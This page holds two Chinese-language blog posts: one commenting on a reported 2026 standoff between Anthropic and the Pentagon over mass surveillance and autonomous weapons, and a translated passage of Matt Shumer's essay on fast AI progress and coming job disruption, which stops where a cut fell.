Infosec Press

Reader

Read the latest posts from Infosec Press.

from 東方琉璃淨土

AI 監控的戰線,早就越過你我以為的邊界。

2026 年 2 月底,美伊戰爭剛剛開打的那個星期。

美國國防部長 Pete Hegseth 下了最後通牒:美國公司 Anthropic 若不在週五下午 5 點 01 分前讓步,將被打上「供應鏈風險」的標籤——這個標籤,向來只貼在中國企業或俄羅斯企業身上。

Anthropic CEO Dario Amodei 沒有讓步。


目錄


一家公司,一個宣言

Amodei 後來在 CBS 的訪問裡說了這樣一段話:

「我們是愛國的美國人。我們所做的一切,都是為了這個國家,為了支持美國的國家安全。不同意政府的決定,是世界上最美國的事情之一。我們是愛國者。」

這不只是一場商業上的對峙。這是一條關於 AI 時代、公民自由與國家權力邊界在哪裡的宣言。

有人說,這件事的重要程度,不亞於正在中東燃燒的那場戰爭。

說這話的人沒有在誇大。那場戰爭打完了,世界照樣運轉。但這場衝突的走向,將決定在 AI 時代裡,民主體制的骨架究竟還剩多少。

回到目錄


事件時間軸

這場衝突走得很快。

2021 年,Dario Amodei 和幾位前 OpenAI 研究員,因為對 AI 安全的深切憂慮而出走,創立了 Anthropic。他們的立場從一開始就很清楚:AI 若不謹慎建造,人類文明將付出無法挽回的代價。

幾年之後,Anthropic 卻成了第一家將模型部署進美軍機密雲端的 AI 企業。他們在情報體系和軍事任務支援上的合作程度,遠超過多數同業。Anthropic 從來不是反軍事的公司——他們真心相信,美國需要 AI 優勢來抗衡威權體制,尤其是中國。

問題出在 2026 年初。

五角大廈要求取得 Claude 在「所有合法用途」下的完整使用授權,其中包含兩件 Anthropic 明確說不的事:大規模國內監控,以及完全自主武器(不需要任何人類介入就能開火的系統)。

2 月 26 日,Anthropic 正式拒絕。

2 月 27 日,Hegseth 宣布禁令。幾個小時後,川普在社群平台公開砲轟 Anthropic,要求所有政府機構立即停用 Claude。同一天,美軍對伊朗發動空襲。

OpenAI 的 Sam Altman 則在當天稍晚宣布,OpenAI 已和五角大廈達成協議。

3 月 9 日,Anthropic 向加州聯邦法院提告,稱政府行動「前所未有且違法」,並主張政府此舉侵犯了公司的言論自由與正當程序權利。

3 月 10 日,微軟向法院提交文件,公開聲援 Anthropic,要求法院頒布臨時限制令,阻止禁令正式生效。

回到目錄


Anthropic 到底在拒絕什麼

值得停下來想清楚這件事,因為很容易被政治噪音淹沒。

Anthropic 並不是在拒絕和軍方合作。他們已經在做,而且做得比所有 AI 企業都更深。Amodei 在 CBS 的訪問裡說得很直接:「我們對國防部所有用途都 OK,基本上是 98% 或 99% 的用途,除了我們擔憂的兩件事。」

第一件事,大規模國內監控。五角大廈要求的是「所有合法用途」。但 Amodei 的解釋是,問題恰恰出在「合法」這兩個字上——有一種監控行為,在技術上沒有違法,是因為法律壓根還沒有追上技術的步伐。從私人企業購買的零散個人資料,透過 AI 拼接成對每位公民的完整追蹤檔案,這件事在 AI 問世之前根本辦不到,所以法律從來沒有被設計來阻止它

「技術發展的速度,超前了法律。」

第二件事,完全自主武器——不需要任何人類參與就能自行開火的武器系統。Amodei 說,今天的 AI 模型根本還沒有可靠到足以承擔這種責任。他在訪問裡說:「任何真正和 AI 模型合作過的人都知道,它存在一種根本的不可預測性,是我們在技術上還沒有解決的問題。」

五角大廈的立場是:這些事情都在法律允許範圍內,一家私人公司沒有資格在這裡劃線。

Anthropic 的立場是:他們不是要替軍方拍板決策,他們只是不願意在法律還沒趕上技術之前,成為讓那些重大決策得以執行的底層工具。

回到目錄


中國的影子:那 2.4 萬個假帳號

要理解 Anthropic 在這場衝突裡的位置,必須先看另一件事。

2026 年 2 月,Anthropic 公開指控三家中國 AI 公司——DeepSeek、Moonshot AI 與 MiniMax——利用超過 2.4 萬個假帳號,對 Claude 發動了超過 1,600 萬次互動,採用一種叫「蒸餾(distillation)」的技術,系統性地竊取 Claude 的核心能力,鎖定目標包括代理式推理、工具使用和程式編碼。

Anthropic 追蹤到 DeepSeek 超過 15 萬次的互動,其中有一個格外令人不安的細節:他們的目標之一,是讓模型學會對政治敏感問題給出「符合中國審查要求的安全替代回應」。這不只是技術層面的抄襲,他們還在訓練模型吸收威權審查的思維邏輯。

Anthropic 在公開聲明中指出,透過非法蒸餾建立的模型,很可能無法保留原本的安全防護機制——這意味著危險能力可能在幾乎沒有任何保護的情況下對外擴散。

公司因此呼籲進一步收緊對中國的 AI 晶片出口管制。Amodei 更早在達沃斯公開說,向中國出售高階 AI 晶片就像「把核武賣給北韓」。

這是一家在對中國 AI 威脅的判斷上,立場和美國國家利益高度咬合的公司。把這一點和它在五角大廈議題上的立場擺在一起,浮現出的是一幅完整的圖像:Anthropic 不是反政府,也不是反軍方,它反對的是讓 AI 在沒有任何人類監督的前提下被用來對付人類——不論那個對象是境外敵人,還是本國公民。

回到目錄


科技跑在法律前面:我們該怎麼辦?

這場衝突有一個深層問題,是所有討論都在迴避的:

如果技術發展的速度永遠快過法律,那誰來填補那個空白?

《The Coming Wave》 的作者 Mustafa Suleyman,是 Google DeepMind 的共同創辦人,也是當今最具影響力的 AI 思想家之一。他在書中提出了一個他稱之為「圍堵(containment)」的核心命題:AI 的擴散速度已經徹底超越了任何現有治理機制的承載能力,而我們面對這道難題,其實只有三條路可走,但每一條都要付出代價。

一是放慢科技本身的速度。先暫停開發,等法律和監管追上來。代價是:中國不會跟著暫停,美國若單方面踩煞車,競爭優勢就會滑向威權體制那一邊。

二是讓企業自主控管。由 AI 公司各自設定使用限制,也就是 Anthropic 現在正在做的事。代價是:一家沒有民選授權的私人公司,憑什麼做出這些牽動深遠的決定?Palmer Luckey 稱之為「企業威權主義」,這個說法並非毫無根據。

三是加速立法跟上。由民選機構以最快速度建立新的法律框架,讓政府的 AI 使用行為受到明確的司法授權和國會監督。這是三條路裡最理想的一條,也是短期內最難走通的——美國國會通過一部重要的科技立法,往往需要幾年,甚至幾十年。

Amodei 在 CBS 的訪問裡也談到了這個困境。他說,大規模 AI 監控之所以算合法,「不是因為法律允許,而是因為法律還不知道這件事的存在。技術的發展超前了法律的步伐。」

這不是 Anthropic 獨有的處境。這是整個 AI 時代共同面對的困境。

在法律跟上之前,某個地方必須有人站著,說「這件事等一下」。目前,Anthropic 選擇站在那個位置。這是一個有代價的選擇——財務上、政治上,代價都是真實的。但如果沒有任何人站在那個位置,空白期間會發生什麼事,不需要太豐富的想像力就能描繪出來。

回到目錄


Ben Thompson 的冷靜分析:核武隱喻

長居台灣的科技評論家 Ben Thompson,是全球最受推崇的科技產業分析師之一。他的訂閱電子報 Stratechery 在矽谷有著相當份量的影響力。在台灣生活的經歷,讓他對民主社會如何在威權壓力下保持韌性,有著格外貼身的理解。

他在〈Anthropic and Alignment〉一文中,提出了一個殘酷而清醒的分析框架。

他從美伊戰爭切入,指出國際法之所以有效,根本原因不在道義,而在是否有力量執行——沒有超國家的強制機制,「誰違法」這個問題的答案,終究由誰更強來決定。力量(might)才是最後的裁決者。

接著他把這個邏輯投射到 AI 上:如果 AI 的戰略價值真的接近核武等級,那它實質上將重塑全球的權力格局。而一項具備這種分量的技術,不可能長期讓一家未經選舉的私人公司握有最終裁量權。

Thompson 也點出了 Amodei 論述裡的一個內在張力:Amodei 自己說過「向中國出售高階 AI 晶片如同把核武賣給北韓」——若他真的認為 AI 等同核武,那美國政府又為何會長期容許一家私人公司掌有這等戰略資產的最終決定權?

他給出的結論近乎二選一:Anthropic 要不接受從屬於國家決策框架的位置,要不就得承受政府透過法律或更強硬手段來削弱其獨立性的壓力。

Thompson 並不是在替五角大廈辯護。他指出 Anthropic 對監控問題的憂慮,在法律層面確實站得住腳,只是解決方式應該是推動立法,而不是讓一家公司單方面畫紅線。

這是一個清醒的分析。它暗示的是:即使 Anthropic 的判斷是對的,它選擇的應對方式也可能埋下更大的問題。但在更好的方式出現之前,這個選擇依然需要有人做出來。

回到目錄


Anduril CEO 的另一面:民主是誰說了算?

Anduril 是美國最舉足輕重的國防科技新創之一,核心業務涵蓋無人機、反無人機系統與 AI 武器平台。創辦人 Palmer Luckey 在這場衝突中的立場毫不含糊——他站在五角大廈那一邊。

他說了這樣一句話:「任何說國防企業應該超越法律、超越立法者和民選領袖來決定合作對象的人,你等於是在說你不相信這個民主實驗,你想要的是一種『企業威權主義』。」

這個論點有其說服力。在民主社會,軍事能力的動用授權本來就應該屬於民選政府,而不是由科技公司的 CEO 替選民做決定。如果讓私人企業來決定哪些武器可以製造、哪些技術可以部署,反而是一種隱性的去民主化。

但這個論點有一個它自己始終沒有回答的問題:

「合法」的邊界,是誰畫的?

如果民選政府的決定是「允許 AI 在沒有司法授權的情況下追蹤所有公民」,而這件事之所以合法,只是因為法律還沒有來得及把它列為違法——那這個「由人民決定」的民主程序,到底在保護誰的自由?

Anthropic 的立場不是「我們比政府更懂」,而是「在法律趕上技術之前,我們不願意成為填補那段空白的工具」。這兩個立場之間的距離,比表面上看起來的要遠得多。

回到目錄


OpenAI 的決定,以及一個人的辭職

五角大廈宣布對 Anthropic 祭出禁令的幾個小時後,Sam Altman 宣布:OpenAI 已和國防部達成協議,允許其 AI 模型部署於機密網路之中。

時機過於完美,讓很多人感到不舒服。

Altman 後來在 X 上坦承,這件事看起來「投機而且草率(opportunistic and sloppy)」,並說公司「不應該這樣倉促」。

OpenAI 隨後修改了協議內容,加入了禁止大規模國內監控的條款——措辭和 Anthropic 最初堅持的保護幾乎如出一轍。Altman 甚至在事後公開表示,他希望五角大廈能給 Anthropic 和 OpenAI 完全相同的合約條件。

但就在協議宣布後不久,OpenAI 機器人部門負責人 Caitlin Kalinowski 在 X 和 LinkedIn 上公開宣布辭職。

她在貼文裡寫道:「AI 在國家安全中確實扮演重要角色。但在沒有司法授權的情況下監控美國人,以及在沒有人類授權的情況下執行致命行動,是應該被更慎重討論的紅線,而這個決定沒有做到。這是關於原則,不是關於人。」

她說,她對 Altman 和整個 OpenAI 團隊仍懷有深深的敬意。問題不在人,在於這件事被決定得太快了。

這是 OpenAI 內部對五角大廈協議表達異議的最高層級聲音。當一家公司最資深的部門負責人之一,因為合約背後的倫理疑慮而選擇辭職,這件事本身已經說明了一些什麼。

回到目錄


微軟出手,商業代價已現

五角大廈的禁令所帶來的商業衝擊,不是假設性的。

Anthropic 財務長 Krishna Rao 在法庭文件中估算,若黑名單措施維持不變,公司 2026 年的營收可能蒸發「數十億美元」。原本預計全年超過 5 億美元的公部門年度經常性收入,可能大幅萎縮甚至歸零。目前已有超過 100 家企業客戶表達困惑、疑慮與觀望,一家年合約規模達數百萬美元的夥伴已轉向競爭對手,另有多筆總計逾億美元的金融業合作計畫被迫中止。

3 月 10 日,微軟向法院提交文件,聲援 Anthropic 的訴訟,要求法院頒布臨時限制令,阻止禁令正式生效。

微軟的論點耐人尋味。文件中警告:若禁令持續,公司及其他科技企業可能被迫「立即調整目前與國防部相關的產品與合約配置」,而這「可能在關鍵時刻削弱美軍的作戰能力」。

五角大廈以「國家安全」為由封殺 Anthropic,微軟卻用同樣的「國家安全」邏輯,反過來主張封殺本身才是對國家安全的真正威脅。

與此同時,科技業已有近 900 名工程師聯署,其中包含約 800 名 Google 員工和近 100 名 OpenAI 員工,公開反對軍方對 Anthropic 的行動,並呼籲國防部撤回「供應鏈風險」的認定。

這場衝突早就不只是 Anthropic 一家公司的事了。

回到目錄


Anthropic 是愛國企業嗎?

這個問題的答案,取決於你怎麼定義「愛國」。

如果愛國意味著服從政府的每一道命令,那 Anthropic 不是。

如果愛國意味著守護這個國家建立時所依憑的價值——免於任意監控的自由,以及人類對致命武器的最終控制權——那 Anthropic 的立場,反而比任何人都更貼近那個定義的核心。

Anthropic 是第一家把 Claude 部署進美軍機密雲端的 AI 企業。他們在情報社群和軍事任務支援上的合作深度,超過了絕大多數同業。他們公開指控中國 AI 公司竊取技術,呼籲收緊晶片出口管制,明確將中國的 AI 擴張定性為民主世界所面臨的系統性威脅。

他們的立場不是「AI 不應該用於軍事」,而是「AI 不應該在缺乏監督的情況下被用來對付美國自己的公民」。這兩個句子之間,有一道非常寬的鴻溝。

Amodei 在 CBS 訪問最後說:「不同意政府的決定,是世界上最美國的事情之一。我們在這件事上的每一個選擇,都是為了這個國家的價值而站立。」

中國不需要 AI 安全護欄,因為它的政治體制本來就建立在監控和管控之上。而如果美國為了追求軍事效率,把 AI 的安全護欄逐一拆除,美國與中國之間的制度差異,就會從內部開始縮小。

這正是 Anthropic 不願退讓的核心邏輯。若這個邏輯成立,那它的重要性——對民主體制能否長遠存活而言——不亞於任何一場以槍砲打響的戰爭。

回到目錄


戰場之外的戰場

美伊戰爭佔據了所有的頭條。飛彈、油輪、空襲、油價。這些都是看得見的衝突。

但有一場戰爭正在視線之外進行,它的戰場是 AI 模型的使用條款,是聯邦法院的訴狀,是一封 1,500 萬人看過的辭職信,是近 900 名工程師的連署,是一家公司選擇在巨大的商業壓力面前不讓步。

你可以不同意 Anthropic 的做法。你可以認為 Palmer Luckey 說得有道理,私人公司不應該凌駕民選政府做出這類決定。你可以認為 Ben Thompson 是對的,AI 的戰略分量讓國家控制權不可避免。

這些都是值得認真面對的立場。

但有一件事是確定的:在 AI 技術已經能夠建立從未有過的監控能力、而法律還沒有跟上的這段空白期間,某個地方必須有人站著說「等一下,我們還沒有談清楚這件事」。

那個人,或那家公司,會付出代價。Anthropic 正在付出它的代價。

我們還沒有想清楚的問題是:

在法律終於跟上技術之前,那個代價應該由誰來承擔?承擔它的,算不算是一種愛國?

還有一個更安靜的問題,在所有新聞的喧嚷過去之後,值得獨自坐著想一想:

當一個社會決定讓 AI 在法律灰色地帶運作,它所付出的,是哪一種自由?


本文綜合整理自 CBS News(Dario Amodei 專訪逐字稿)、鉅亨網、ABMedia、TechNews、中央社、Ben Thompson(Stratechery《Anthropic and Alignment》)等媒體報導與分析文章。


#ai #anthropic #democracy #pentagon #tech

 
Read more...

from 東方琉璃淨土

AI很重要,但是像葉修這樣的人,使用AI不當可能會發生AI Brain Fry

很多人從「某些事情是安全的」這個概念中尋找安慰——AI 可以處理日常工作,但無法取代人類的判斷力、創造力、戰略思維、同理心。

我以前也這麼說。

我不確定我現在還相信這一點。


作者:Matt Shumer,2026 年 2 月 9 日

回想一下 2020 年 2 月。

如果你當時特別留意,也許你注意到有幾個人在談論一種在海外蔓延的病毒。但大多數人並沒有特別留意。股市表現很好,你的孩子在上學,你照常去餐廳、握手、規劃旅行。如果有人告訴你他在囤積衛生紙,你大概會覺得他在網路的奇怪角落待太久了。然後,在大約三週內,整個世界翻天覆地。你的辦公室關閉了,孩子回到家,生活變成了一個月前的你絕對不會相信的模樣。 我認為,我們現在正處在一件遠比新冠肺炎大得多的事情的「感覺小題大作」階段。

我在 AI 新創公司工作了六年,也在這個領域進行投資。我活在這個世界裡。而我寫這篇文章,是為了我生命中那些不活在這個世界裡的人——我的家人、朋友,以及那些一直問我「AI 到底是怎麼回事?」卻得不到足以反映真實情況的答案的人。我一直給他們的是那個客套版本,那個雞尾酒派對版本。因為誠實的版本聽起來像我瘋了。有一段時間,我告訴自己這是一個足夠好的理由,讓我把真正發生的事藏在心底。但我說的話與真實發生的事之間的落差,已經大到無法忽視了。我在乎的人值得聽到即將到來的事,即使它聽起來很瘋狂。

我要先說清楚一件事:儘管我在 AI 領域工作,我對即將發生的事幾乎沒有任何影響力,業界絕大多數人也一樣。未來正在被少數人塑造:幾間公司裡幾百名研究人員——OpenAI、Anthropic、Google DeepMind,以及少數幾家。一個由小團隊在幾個月內管理的訓練過程,就可以產出一個改變整個技術走向的 AI 系統。我們這些在 AI 領域工作的人,大多數都是在我們沒有奠定的基礎上進行建設。我們和你一樣在旁觀這一切——只是我們碰巧離得夠近,能先感受到地面的震動。

但現在是時候了。不是那種「最終我們應該談談這件事」的方式,而是「這正在發生,我需要你理解它」的方式。


我知道這是真的,因為它先發生在我身上

科技圈以外的人尚未完全理解的事情是:為什麼業界這麼多人現在都在發出警報——因為這已經發生在我們自己身上了。我們不是在預測。我們在告訴你,這在我們自己的工作中已經發生,並警告你:你是下一個。

多年來,AI 一直在穩定進步,偶爾有大躍進,但每次躍進之間的間隔都足夠長,讓你能夠消化。然後在 2025 年,新的模型訓練技術解鎖了更快的進步速度。然後更快。再更快。每一個新模型不只是比上一個更好——進步的幅度更大,新模型的發布間隔也更短。我越來越多地使用 AI,與它來回的次數越來越少,看著它處理我曾經認為需要我專業知識的事情。

然後,在 2 月 5 日,兩個主要的 AI 實驗室在同一天發布了新模型:OpenAI 的 GPT-5.3 Codex,以及 Anthropic 的 Opus 4.6(Claude 的製造商,ChatGPT 的主要競爭者之一)。有什麼東西「喀嚓」了一聲。不像一個開關被打開——更像是當你意識到水一直在你周圍上漲,現在已經到了你胸口的那一刻。

我在工作中實際的技術工作上已不再被需要了。 我用普通英文描述我想要建構的東西,它就……出現了。不是我需要修改的草稿,而是完成品。我告訴 AI 我想要什麼,離開電腦四個小時,回來發現工作已完成。完成得很好,比我自己做的還好,無需修改。幾個月前,我還在與 AI 來回溝通、引導它、做修改。現在我只需要描述結果然後離開。

讓我舉個例子,讓你了解這在實踐中的樣子。我會告訴 AI:「我想建立這個應用程式,以下是它應該做的事,大致上應該長這樣,把使用者流程、設計都搞定。」然後它就會去做。它寫了數萬行程式碼。然後,這是一年前無法想像的部分——它自己打開這個應用程式,點擊按鈕,測試功能,像人一樣使用這個應用程式。如果它不滿意某個地方的外觀或感覺,它自己回去修改,獨立迭代、修復和完善,直到滿意為止。只有當它決定這個應用程式達到它自己的標準後,才回來對我說:「可以讓你測試了。」而當我測試它時,通常是完美的。

我沒有誇大。這就是我本週一的工作樣貌。

但最讓我震撼的是上週發布的模型(GPT-5.3 Codex)。它不只是在執行我的指令,它在做出有智慧的決策。它第一次有了感覺像是判斷力的東西,有了品味——那種無法言說的、知道什麼是正確決定的感覺,是人們一直說 AI 永遠不會擁有的東西。這個模型擁有它,或者說足夠接近,以至於這個區別開始變得不那麼重要了。

我一直是 AI 工具的早期採用者,但過去幾個月震驚了我。這些新的 AI 模型不是漸進式的改進,這是完全不同的事物。

這就是為什麼這件事對你也很重要,即使你不在科技業。

AI 實驗室做了一個刻意的選擇:他們首先專注於讓 AI 擅長寫程式碼——因為建構 AI 本身需要大量程式碼。如果 AI 能寫那些程式碼,它就能幫助建構下一個版本的自己,而那個更聰明的版本可以寫出更好的程式碼,進而建構出更聰明的版本。讓 AI 擅長寫程式,是解鎖一切的策略。這就是為什麼他們先做這件事。我的工作比你的工作更早開始改變,不是因為他們針對軟體工程師——這只是他們選擇先瞄準的方向的副作用。

他們現在已經完成了。他們正在轉向其他一切。

科技工作者在過去一年所經歷的,看著 AI 從「有用的工具」變成「比我更擅長做我的工作」,就是其他每個人即將要經歷的。法律、金融、醫學、會計、顧問、寫作、設計、分析、客戶服務。不是十年後。建構這些系統的人說是一到五年。有些人說更短。而以我在過去幾個月看到的情況,我認為「更短」更有可能。


「但我試過 AI,它沒那麼好用」

我常聽到這句話,我理解,因為這曾經是真的。

如果你在 2023 年或 2024 年初試過 ChatGPT,覺得「它會捏造資訊」或「沒什麼印象深刻」,你是對的。那些早期版本確實有侷限,它們會自信地說出一些胡說八道的話。

那是兩年前的事了。以 AI 的時間尺度來說,那是遠古時代。

今天可用的模型,與六個月前的相比已是面目全非。關於 AI 是否「真的在進步」或「撞牆了」的爭論,那個持續超過一年的爭論,結束了。誰還在做那種論斷,要麼是沒有使用過當前的模型,要麼是有動機去淡化正在發生的事,要麼是基於 2024 年的體驗來評估,而那已不再相關。公眾認知與當前現實之間的鴻溝是巨大的,而這個鴻溝是危險的——因為它阻止人們做好準備。

問題的一部分是大多數人在使用免費版本的 AI 工具。免費版本比付費用戶能使用的東西落後超過一年。以免費版 ChatGPT 來評判 AI,就像用折疊式手機來評估智慧型手機的現狀。每天真正把頂尖工具用於實際工作的付費用戶,知道接下來會發生什麼。

我想到我的一位律師朋友,我一直告訴他在事務所嘗試使用 AI,他一直找理由說行不通——它不是為他的專業領域建構的、測試時出了錯、它不理解他工作的細微之處。我理解。但我已經有大型律師事務所的合夥人聯繫我尋求建議,因為他們試過了當前版本,看到了這將走向何方。其中一位大型事務所的管理合夥人,每天花幾個小時使用 AI。他告訴我,這就像有一個隨時可以立即調度的助理團隊。他不是因為它是玩具才用它,他用它是因為它有用。他告訴我一句讓我念念不忘的話:每隔幾個月,它在他工作上的能力就會顯著提升。他說如果它保持這個軌跡,他預計在不久後它就能完成他所做的大部分事情——而他是一位有幾十年經驗的管理合夥人。他沒有恐慌,但他非常密切地關注著。

那些在業界領先的人(那些真正認真嘗試的人),並沒有輕視這件事,他們被它已經能做到的事情震驚,並據此調整好自己的位置。


這一切進展有多快

讓我把進步的速度說得具體一點,因為如果你沒有密切追蹤,這是最難相信的部分。 2022 年,AI 連基本的算術都無法可靠地完成,它會自信地告訴你 7 × 8 = 54。 到了 2023 年,它可以通過律師考試。 到了 2024 年,它可以寫出可運行的軟體,並解釋研究所等級的科學知識。 到了 2025 年底,世界上一些最優秀的工程師表示,他們已將大部分程式碼編寫工作交給了 AI。

2026 年 2 月 5 日,新的模型出現了,讓之前的一切感覺像是另一個時代。

如果你已有幾個月沒有嘗試 AI,今天存在的東西對你來說將會難以辨認。

有一個叫做 METR 的組織實際上用數據衡量這一點。他們追蹤一個模型在沒有人類幫助的情況下,能夠端到端成功完成的真實世界任務的時長(以人類專家完成該任務所需的時間來衡量)。大約一年前,答案大概是十分鐘,然後是一個小時,然後是幾個小時。最近的測量(2025 年 11 月的 Claude Opus 4.5)顯示,AI 能夠完成需要人類專家將近五個小時才能完成的任務。而這個數字大約每七個月翻一番,最新數據表明它可能正在加速到每四個月翻一番。

即使是這個測量,也尚未更新納入本週才剛出現的模型。根據我的使用體驗,這次躍進是極其顯著的。我預計 METR 圖表的下一次更新將顯示另一個重大飛躍。

如果你延伸這個趨勢(它已持續多年,沒有趨緩的跡象),我們看到的是:在不到一年內,AI 將能夠獨立工作數天;兩年內,數週;三年內,可以處理長達一個月的專案。

Amodei 說,「在幾乎所有任務上都大幅優於幾乎所有人類的 AI 模型」,有望在 2026 或 2027 年實現。

讓這件事沉澱一下。如果 AI 比大多數博士更聰明,你真的認為它做不到大多數辦公室工作嗎? 想想這對你的工作意味著什麼。


AI 正在建構下一個 AI

還有一件事正在發生,我認為這是最重要的發展,也是最不被理解的。

2 月 5 日,OpenAI 發布了 GPT-5.3 Codex。在技術文件中,他們寫道:

「GPT-5.3-Codex 是我們第一個在創建自身方面發揮了重要作用的模型。Codex 團隊使用早期版本來調試自身的訓練、管理自身的部署,並診斷測試結果和評估。」

再讀一遍。這個 AI 幫助建構了自己。

這不是對某天可能發生的事情的預測。這是 OpenAI 現在告訴你,他們剛剛發布的 AI 被用來創建自身。讓 AI 變得更好的主要因素之一,是應用於 AI 開發的智慧。而 AI 現在已足夠聰明,可以有意義地貢獻於自身的改進。

Anthropic 的 CEO Dario Amodei 說,AI 現在正在為他的公司編寫「大量程式碼」,當前 AI 與下一代 AI 之間的回饋循環正在「逐月加速」。他說我們可能「距離當前這代 AI 自主建構下一代的時間點只有一到兩年」。

每一代都幫助建構下一代,下一代更聰明,更快地建構下一代,而那個更聰明的版本繼續這個循環。研究人員稱之為「智慧爆炸」。而那些最清楚的人——正在建構它的人——相信這個過程已經開始了。


這對你的工作意味著什麼

我要直接告訴你,因為我認為你值得獲得誠實,而不是安慰。

Dario Amodei,可能是 AI 業界最注重安全的 CEO,公開預測 AI 將在一到五年內消滅 50% 的入門級白領工作。業界許多人認為他還保守了。根據最新模型的能力,大規模顛覆的條件可能在今年年底之前就到來了,它要滲透整個經濟還需要一些時間,但基礎能力現在就已到來。

這與以前每一波自動化都不同,我需要你理解為什麼。AI 不是在取代某一個特定的技能。它是認知工作的通用替代品,同時在所有事情上都變得更好。當工廠自動化時,被取代的工人可以重新培訓成辦公室工作者。當網路顛覆零售業時,工人轉向物流或服務業。但 AI 不會留下一個方便轉移的空缺。無論你重新培訓什麼,它也在那方面進步。

讓我舉幾個具體的例子讓這件事有感——但我要說清楚,這些只是例子,這個清單遠不完整。如果你的工作沒有被提到,這並不意味著它是安全的。幾乎所有的知識工作都受到影響。

法律工作:AI 已經能夠閱讀合約、總結判例法、起草訴狀、進行法律研究,達到堪比初級合夥人的水準。

財務分析:建立財務模型、分析數據、撰寫投資備忘錄、生成報告。AI 勝任這些工作,並且正在快速進步。

寫作與內容:行銷文案、報告、新聞報導、技術寫作。品質已達到許多專業人士無法區分 AI 輸出與人類作品的程度。

軟體工程:這是我最熟悉的領域。一年前,AI 連幾行程式碼都很難寫正確。現在它寫出數十萬行可以正確運行的程式碼。工作的大部分已經自動化——不只是簡單的任務,而是複雜的、多天的專案。幾年內,程式設計職位將大幅減少。

醫學分析:閱讀掃描影像、分析化驗結果、提出診斷建議、審查文獻。AI 在多個領域已接近或超過人類的表現。

客戶服務:真正有能力的 AI 代理——不是五年前令人沮喪的聊天機器人——正在被部署,處理複雜的多步驟問題。

很多人從「某些事情是安全的」這個概念中尋找安慰——AI 可以處理日常工作,但無法取代人類的判斷力、創造力、戰略思維、同理心。我以前也這麼說。我不確定我現在還相信這一點。

最近的 AI 模型所做的決定,感覺像是判斷力。它們展示出一種感覺像品味的東西——一種直覺式的感知,知道什麼是正確的選擇,而不只是技術上正確的選擇。一年前,這是無法想像的。我現在的經驗法則是:如果一個模型今天顯示出某種能力的哪怕是一絲跡象,下一代將真正擅長它。這些東西是指數式增長的,不是線性的。

AI 會複製人類深刻的同理心嗎?取代多年建立的關係中的信任?我不知道。也許不會。但我已經看到人們開始依賴 AI 尋求情感支持、建議和陪伴,這個趨勢只會增長。

我認為誠實的答案是:在中期內,任何可以在電腦上完成的事情都不是安全的。如果你的工作發生在螢幕上(如果你核心工作是通過鍵盤閱讀、寫作、分析、決策、溝通),那麼 AI 正在覬覦其中的重要部分。時間表不是「某天」,它已經開始了。

最終,機器人也將處理體力工作,只是現在還沒完全到位。但以 AI 的標準來說,「還沒完全到位」有一種令人意外地快速變成「已到位」的方式。


你實際上應該做什麼

我寫這篇文章不是為了讓你感到無助,而是因為我認為你現在能擁有的最大優勢,就只是早一步。早一步理解,早一步使用,早一步適應。

認真使用 AI,而不只是把它當搜尋引擎。 訂閱 Claude 或 ChatGPT 的付費版本,一個月 20 美元。但兩件事很重要。第一:確保你使用的是最佳可用模型,而不只是預設的。這些應用程式通常預設使用更快但更笨的模型,深入設定或模型選擇器,選擇最強大的選項。現在 ChatGPT 上是 GPT-5.2,Claude 上是 Opus 4.6,但這每隔幾個月就會改變。

第二,更重要的是:不要只用它來問簡短的問題,這是大多數人犯的錯誤,他們把它當 Google 用,然後困惑地問有什麼了不起。應該把它真正帶進你的工作。如果你是律師,就把合約餵給它,請它找出每一個可能傷害你客戶的條款。如果你在金融業,給它一份雜亂的試算表,請它建立模型。如果你是主管,把你團隊的季度數據貼上去,請它找出背後的故事。走在前面的人不是隨意地使用 AI,他們在積極尋找方法自動化那些以往要花幾個小時的工作。從你花最多時間的事情開始,看看會發生什麼。

不要因為某件事看起來太難就假設它辦不到,先試試。如果你是律師,不要只用它來做快速的研究問題,給它一整份合約,請它起草一份回應。如果你是會計師,不要只問它稅法,給它客戶的完整申報表,看看它找到什麼。第一次嘗試可能不完美,沒關係,反覆試驗、重新措辭、給更多背景、再試一次。你可能會對什麼奏效感到震驚。記住:如果它今天勉強有效,你幾乎可以確定六個月後它將近乎完美地完成它。這個軌跡只往一個方向走。

這可能是你職業生涯中最重要的一年,據此行動。 現在有一個短暫的窗口,大多數公司的大多數人仍然忽視這件事。那個走進會議室說「我用 AI 在一個小時內完成了這個分析,而不是三天」的人,將成為房間裡最有價值的人。不是最終,是現在。學習這些工具,熟練掌握,展示什麼是可能的。這個窗口不會長時間保持開著,一旦每個人都弄明白了,優勢就消失了。

放下你的自尊。 那位律師事務所的管理合夥人不以每天花幾個小時使用 AI 為恥,他這樣做,恰恰是因為他足夠資深,能夠理解這件事的風險。掙扎最多的人,將是那些拒絕參與的人——那些斥之為時尚的人,那些感覺使用 AI 有損自己專業地位的人,那些假設他們的領域很特殊且免疫的人。沒有哪個領域是免疫的。

整頓你的財務狀況。 我不是財務顧問,我也不是要嚇你做出任何草率的事。但如果你甚至部分地相信,未來幾年可能給你的行業帶來真正的顛覆,那麼基本的財務韌性就比一年前更重要了。盡可能積累儲蓄,對承擔新債務保持謹慎,思考你的固定開支是給你帶來靈活性還是把你鎖死。給自己留有後路。

思考自己的處境,專注於最難被取代的事情。 有些事情 AI 需要更長時間才能取代:多年建立的關係和信任;需要實地出現的工作;有執照問責制的角色;有繁重監管障礙的行業,採用速度將被合規性、責任和機構慣性所延緩。這些都不是永久的盾牌,但它們爭取了時間。而時間,現在是你能擁有的最有價值的東西——只要你用它來適應,而不是假裝這件事沒有發生。

重新思考你對孩子說的話。 那個標準劇本:好好讀書、上好大學、找一份穩定的專業工作——它直接指向最暴露的職位。我不是說教育不重要,但對下一代來說,最重要的事情是學習如何使用這些工具,並追求他們真正熱衷的事情。沒有人確切知道十年後的就業市場是什麼樣子,但最有可能繁榮的人是那些充滿好奇心、適應力強,並且善於用 AI 去做他們真正在乎的事情的人。教你的孩子成為建構者和學習者,而不是為了一條可能在他們畢業前就已消失的職業道路而優化。

